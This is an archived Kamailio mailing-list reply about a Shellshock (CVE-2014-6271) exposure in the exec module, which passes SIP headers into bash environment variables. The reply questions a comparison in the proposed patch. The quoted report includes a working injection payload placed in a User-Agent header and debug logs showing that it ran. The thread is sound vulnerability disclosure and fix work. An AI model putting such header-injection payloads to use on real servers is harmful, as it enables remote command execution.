<html>
<head>
<meta content="text/html; charset=windows-1252"
http-equiv="Content-Type">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Hi Seudin,<br>
<br>
thanks for heads up for vulnerabilities out there affecting us and
the patch!<br>
<br>
One comment regarding the patch, I see this comparison:<br>
<br>
if (!strncmp(w->u.hf->body.s,"()
{",MIN(w->u.hf->body.len,2))) {<br>
<br>
and I see as being compared of size 4 string. Missing something?<br>
<br>
Cheers,<br>
Daniel<br>
<br>
<div class="moz-cite-prefix">On 25/09/14 16:40, Seudin Kasumovic
wrote:<br>
</div>
<blockquote
cite="mid:CAHbz3+2MkDwQhKLLQ58MrZTsXAGrF5BuTVm_vOMC1+tcYiHfbQ@mail.gmail.com"
type="cite">
<div dir="ltr">Hi kamailio users,
<div><br>
</div>
<div>we are witnesses of new discovered bug in bash: Bash Code
Injection Vulnerability via Specially Crafted Environment
Variables (CVE-2014-6271) <a moz-do-not-send="true"
href="https://access.redhat.com/node/1200223">https://access.redhat.com/node/1200223</a></div>
<div><br>
</div>
<div>As exec module exports all SIP headers in environment so
it's was easy to push bash command.<br>
</div>
<div><br>
</div>
<div>There is attached simple kamailio test config file.</div>
<div>With sipp we sent header to output 123 into file /tmp/123
like this:</div>
<div><br>
</div>
<div>User-Agent: () { :;}; echo 123 > /tmp/123<br>
</div>
<div>
<div><br>
</div>
<div>Debug output from kamailio is:</div>
<div><br>
</div>
<div>
<p class="">5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CONTENT_LENGTH=135</p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CONTENT_TYPE=application/sdp</p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_ALLOW=INVITE, ACK, CANCEL, OPTIONS,
BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH</p>
<p class=""><b> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_USER_AGENT=() { :;}; echo 123
> /tmp/123</b></p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_SUBJECT=Performance Test</p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_MAX_FORWARDS=70</p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CONTACT=<<a
moz-do-not-send="true"
href="http://sip:T00157@198.51.100.2:5060">sip:T00157@198.51.100.2:5060</a>></p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CSEQ=1 INVITE</p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_CALLID=<a moz-do-not-send="true"
href="mailto:1-5394@198.51.100.2">1-5394@198.51.100.2</a></p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_TO=+442033998806
<a class="moz-txt-link-rfc2396E" href="sip:+442033998806@orange.voip"><sip:+442033998806@orange.voip></a></p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_FROM=+442033998833
<a class="moz-txt-link-rfc2396E" href="sip:T00157@orange.voip"><sip:T00157@orange.voip></a>;tag=5394SIPpTag001</p>
<p class=""> 5(30147) DEBUG: exec [exec_hf.c:278]:
print_hf_var(): SIP_HF_VIA=SIP/2.0/UDP
198.51.100.2:5060;branch=z9hG4bK-5394-1-0</p>
<p class=""> 5(30147) DEBUG: exec [exec_mod.c:175]:
w_exec_msg(): executing [/bin/true]</p>
</div>
<div>ls /tmp shows new created file !!!</div>
<div><br>
</div>
<div>I created simple patch to fix this issue in exec module
based on suggestion from RedHat until you fix your bash what
is recommended.</div>
<div><br>
</div>
-- <br>
Seudin Kasumovic<br>
<br>
</div>
</div>
<br>
<fieldset class="mimeAttachmentHeader"></fieldset>
<br>
<pre wrap="">_______________________________________________
SIP Express Router (SER) and Kamailio (OpenSER) - sr-users mailing list
<a class="moz-txt-link-abbreviated" href="mailto:sr-users@lists.sip-router.org">sr-users@lists.sip-router.org</a>
<a class="moz-txt-link-freetext" href="http://lists.sip-router.org/cgi-bin/mailman/listinfo/sr-users">http://lists.sip-router.org/cgi-bin/mailman/listinfo/sr-users</a>
</pre>
</blockquote>
<br>
<pre class="moz-signature" cols="72">--
Daniel-Constantin Mierla
<a class="moz-txt-link-freetext" href="http://twitter.com/#!/miconda">http://twitter.com/#!/miconda</a> - <a class="moz-txt-link-freetext" href="http://www.linkedin.com/in/miconda">http://www.linkedin.com/in/miconda</a>
Next Kamailio Advanced Trainings 2014 - <a class="moz-txt-link-freetext" href="http://www.asipto.com">http://www.asipto.com</a>
Sep 22-25, Berlin, Germany</pre>
</body>
</html>